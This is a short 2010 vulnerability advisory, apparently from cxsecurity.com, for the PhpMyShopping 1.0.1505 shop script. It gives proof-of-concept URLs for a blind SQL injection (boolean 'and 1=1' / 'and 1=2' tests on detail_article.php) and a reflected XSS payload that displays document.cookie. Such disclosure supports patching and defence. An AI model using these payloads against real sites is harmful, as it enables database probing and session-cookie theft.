PhpMyShopping 1.0.1505 cross site scripting remote blind SQL injection

2010.10.02
Credit: Metropolis
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#################################################################### .:. Author : Metropolis .:. Home : www.metropolis.fr.cr .:. Script : PhpMyShopping .:. Version : v1.0.1505 .:. Download Script: http://www.phpmyshopping.org/night_build/PhpMyShopping_mono_boutique_v1.0.1505.tar.gz .:. Bug Type : Multiple Vulnerabilities / Blind SQL Injections / XSS #################################################################### ===[ Blind Sql Injection ]=== SQL Error => /detail_article.php?C=3&P=7' www.site.com/detail_article.php?C=3&P=7 [Blind] [Demo] : www.site.com/detail_article.php?C=3&P=1 and 1=1 <-- true www.site.com/detail_article.php?C=3&P=1 and 1=2 <-- false ===[ XSS ]=== www.site.com/detail_article.php?C=3&P=7 [XSS] [Demo] : www.site.com/detail_article.php?C=3&P=7"><script>alert(document.cookie);</script> ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top